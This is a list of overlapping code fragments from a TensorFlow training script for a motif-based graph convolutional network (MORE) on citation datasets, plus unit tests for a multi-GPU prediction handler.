"Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\",
"Not used num_supports = 1 model_func = MORE else: raise ValueError('Invalid argument for",
"t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc = [],",
"used num_supports = 1 model_func = MLP elif FLAGS.model == 'MORE': support =",
"shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32),",
"and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time = time.time() -",
"cost, acc, duration = evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost)",
"batch_run use_batch = False if use_batch: FLAGS.model = 'MotifGCN' lr = [0.01, 0.001,",
"6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of",
"import print_function import time import tensorflow as tf import winsound from Code_utils import",
"adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some",
"for epoch in range(FLAGS.epochs): t = time.time() stop_epoch = epoch + 1 #",
"[32, 64, 128, 256, 512] mode_list = [] for i in range(0, 4):",
"use_batch = False if use_batch: FLAGS.model = 'MotifGCN' lr = [0.01, 0.001, 0.0003,",
"flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev",
"[lr[i], le[i]] for j in range(0, 3): temp2 = temp1 + [mo[j]] for",
"GCN elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 +",
"model evaluation function def evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test = time.time()",
"placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test) #",
"str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for i",
"> np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time = time.time() - train_starttime #",
"print(\"Optimization Finished!\") train_time = time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2,",
"' + str(FLAGS.model)) # Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _",
"test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch",
"number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of motif embedding')",
"[0.01, 0.001, 0.0003, 0.003] le = [300, 500, 1000, 2000] mo = [\"Hadamard\",",
"motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict)",
"support, labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1],",
"{ 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32,",
"mode_list = [] for i in range(0, 4): temp1 = [lr[i], le[i]] for",
"process ---------------------------# # Set random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings",
"flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer',",
"in range(0, 4): temp1 = [lr[i], le[i]] for j in range(0, 3): temp2",
"# 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE'",
"\"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time()",
"== 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func =",
"dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of property embedding')",
"import tensorflow as tf import winsound from Code_utils import * from Code_models import",
"[\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64, 128, 256, 512] mode_list = []",
"tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero':",
"\"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch = False if use_batch: FLAGS.model = 'MotifGCN'",
"# Function: Run training #-------------------------- import package --------------------------# from __future__ import division from",
"shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } #",
"results print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost),",
"FLAGS.dropout}) # Training step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) #",
"string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense',",
"elif FLAGS.model == 'dense': support = [preprocess_adj(adj)] # Not used num_supports = 1",
"= [], [], [] train_loss, val_loss, Tloss = [], [], [] # Train",
"Run training #-------------------------- import package --------------------------# from __future__ import division from __future__ import",
"stop_epoch = epoch + 1 # Construct feed dictionary feed_dict = construct_feed_dict(features, support,",
"model: ' + str(FLAGS.model)) # Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for",
"'the hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number",
"= [] for i in range(0, 4): temp1 = [lr[i], le[i]] for j",
"__future__ import division from __future__ import print_function import time import tensorflow as tf",
"# Define model evaluation function def evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test",
"0.0003, 0.003] le = [300, 500, 1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"]",
"for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with",
"motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports = 1",
"f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i))",
"train_loss.append(outs[1]) # Validation cost, acc, duration = evaluate(features, support, y_val, val_mask, motiffeatures, placeholders)",
"30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden",
"= time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss,",
"random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS",
"model_func = MORE else: raise ValueError('Invalid argument for model: ' + str(FLAGS.model)) #",
"rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1",
"for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for",
"30, 'Tolerance for early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units",
"temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode)",
"f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\")",
"flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') #",
"num_supports = 1 model_func = GCN elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj,",
"tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32),",
"1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif",
"(epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time()",
"embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method",
"test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]):",
"Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break",
"val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]),",
"outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test) # Init",
"range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])),",
"'MORE': support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func = MORE",
"= 1 model_func = MORE else: raise ValueError('Invalid argument for model: ' +",
"time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime",
"# Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden),",
"print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\",",
"0.001, 0.0003, 0.003] le = [300, 500, 1000, 2000] mo = [\"Hadamard\", \"Summation\",",
"string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500,",
"== 'dense': support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func =",
"\"Summation\", \"Connection\" # batch_run use_batch = False if use_batch: FLAGS.model = 'MotifGCN' lr",
"\"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time = time.time()",
"5e-4, 'Weight for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early",
"<NAME> # Data: 2020-01-10 # Function: Run training #-------------------------- import package --------------------------# from",
"= mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data adj, features,",
"support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\",",
"in range(0, 5): temp3 = temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59] #",
"\"Connection\"] la = [32, 64, 128, 256, 512] mode_list = [] for i",
"\"Connection\" # batch_run use_batch = False if use_batch: FLAGS.model = 'MotifGCN' lr =",
"val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features) motiffeatures =",
"y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs = sess.run([model.opt_op, model.loss,",
"of units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim',",
"for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500 # millisecond",
"500, 1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64, 128,",
"= evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results",
"outs_val[0], outs_val[1], (time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc,",
"val_acc, Tacc = [], [], [] train_loss, val_loss, Tloss = [], [], []",
"# helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model",
"test_starttime = time.time() test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders)",
"\"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t)",
"Author: <NAME> # Data: 2020-01-10 # Function: Run training #-------------------------- import package --------------------------#",
"- t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc =",
"la = [32, 64, 128, 256, 512] mode_list = [] for i in",
"print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime # Save with",
"embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch = False",
"mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time,",
"tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse dropout 'num_motif_features_nonzero':",
"Tacc = [], [], [] train_loss, val_loss, Tloss = [], [], [] #",
"# Create model model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess =",
"# batch_run use_batch = False if use_batch: FLAGS.model = 'MotifGCN' lr = [0.01,",
"polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden",
"dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), #",
"j in range(0, 3): temp2 = temp1 + [mo[j]] for k in range(0,",
"outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration",
"sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model = model_func(placeholders, input_dim=features[2][1], logging=True)",
"stop_epoch = 0 for epoch in range(FLAGS.epochs): t = time.time() stop_epoch = epoch",
"sess = tf.Session() # Define model evaluation function def evaluate(features, support, labels, mask,",
"np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset",
"evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc),",
"[], [], [] # Train model train_starttime = time.time() train_time_list = [] stop_epoch",
"mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data",
"shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for",
"# Initialize session sess = tf.Session() # Define model evaluation function def evaluate(features,",
"in range(FLAGS.epochs): t = time.time() stop_epoch = epoch + 1 # Construct feed",
"= [\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64, 128, 256, 512] mode_list =",
"flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden",
"for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for i",
"of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden',",
"layer number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of integration')",
"feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1])",
"= preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports",
"# Print results print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]),",
"method of embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch",
"feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val)",
"chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func = GCN elif FLAGS.model ==",
"degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer",
"on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (# of epochs).') flags.DEFINE_integer('hidden1',",
"placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2],",
"str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for",
"f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\")",
"test_time = time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\",
"\"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime",
"model_func = MLP elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)] # Not used",
"flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2",
"'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden', [256],",
"for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for",
"\"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration = evaluate(features, support,",
"for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") #",
"[tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)),",
"Tloss = [], [], [] # Train model train_starttime = time.time() train_time_list =",
"#-------------------------- import package --------------------------# from __future__ import division from __future__ import print_function import",
"mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1]",
"t = time.time() stop_epoch = epoch + 1 # Construct feed dictionary feed_dict",
"0.003] le = [300, 500, 1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la",
"[], 'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding",
"Print results print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\",",
"mo = [\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64, 128, 256, 512] mode_list",
"logging=True) # Initialize session sess = tf.Session() # Define model evaluation function def",
"[300, 500, 1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64,",
"'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to",
"1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t))",
"2020-01-10 # Function: Run training #-------------------------- import package --------------------------# from __future__ import division",
"integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\",",
"'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on",
"= [preprocess_adj(adj)] num_supports = 1 model_func = GCN elif FLAGS.model == 'gcn_cheby': support",
"test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max",
"argument for model: ' + str(FLAGS.model)) # Define placeholders placeholders = { 'support':",
"f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\")",
"num_supports = 1 model_func = MLP elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)]",
"train_loss, val_loss, Tloss = [], [], [] # Train model train_starttime = time.time()",
"test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\",",
"# Load data adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures =",
"FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a')",
"model_func = GCN elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports =",
"= construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs",
"Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32,",
"for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model = model_func(placeholders, input_dim=features[2][1],"
] |
[
"self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 180) def test_raises_error_if_no_dannce_file(self): with self.assertRaises(FileNotFoundError): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100,",
"def test_dannce_predict_help_message(self): os.system(\"dannce-predict-multi-gpu --help\") def test_com_predict_help_message(self): os.system(\"com-predict-multi-gpu --help\") def test_dannce_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler(",
"\"\"\"Tests for locomotion.tasks.two_tap.\"\"\" import cluster.multi_gpu as multi_gpu import functools from absl.testing import absltest",
"CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_com_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) ==",
"n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_com_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 180)",
"180) def test_raises_error_if_no_dannce_file(self): with self.assertRaises(FileNotFoundError): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True )",
"handler.submit_dannce_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 10) def test_com_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False,",
"cmd = \"dannce-predict-multi-gpu %s --test=True --verbose=False --dannce-file=%s\" % ( CONFIG_PATH, DANNCE_PATH, ) os.system(cmd)",
"= handler.submit_dannce_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 10) def test_com_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100,",
"= multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_com_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file))",
") batch_params, _ = handler.submit_dannce_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 10) def test_com_predict_batch_params(self): handler =",
"verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_com_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params) == 180) def",
"MultiGpuTest(absltest.TestCase): def test_dannce_predict_help_message(self): os.system(\"dannce-predict-multi-gpu --help\") def test_com_predict_help_message(self): os.system(\"com-predict-multi-gpu --help\") def test_dannce_predict_batch_params(self): handler =",
"locomotion.tasks.two_tap.\"\"\" import cluster.multi_gpu as multi_gpu import functools from absl.testing import absltest import numpy",
"import absltest import numpy as np import os DEMO_PATH = \"../demo/markerless_mouse1\" CONFIG_PATH =",
"--help\") def test_com_predict_help_message(self): os.system(\"com-predict-multi-gpu --help\") def test_dannce_predict_batch_params(self): handler = multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False,",
"multi_gpu.MultiGpuHandler( CONFIG_PATH, n_samples_per_gpu=100, verbose=False, test=True, dannce_file=DANNCE_PATH, ) batch_params, _ = handler.submit_com_predict_multi_gpu() self.assertTrue(os.path.exists(handler.batch_param_file)) self.assertTrue(len(batch_params)",
"DEMO_PATH = \"../demo/markerless_mouse1\" CONFIG_PATH = \"../tests/configs/dannce_mouse_config.yaml\" DANNCE_PATH = \"../tests/configs/label3d_dannce.mat\" class MultiGpuTest(absltest.TestCase): def test_dannce_predict_help_message(self):",
"os DEMO_PATH = \"../demo/markerless_mouse1\" CONFIG_PATH = \"../tests/configs/dannce_mouse_config.yaml\" DANNCE_PATH = \"../tests/configs/label3d_dannce.mat\" class MultiGpuTest(absltest.TestCase): def",
"DANNCE_PATH = \"../tests/configs/label3d_dannce.mat\" class MultiGpuTest(absltest.TestCase): def test_dannce_predict_help_message(self): os.system(\"dannce-predict-multi-gpu --help\") def test_com_predict_help_message(self): os.system(\"com-predict-multi-gpu --help\")",
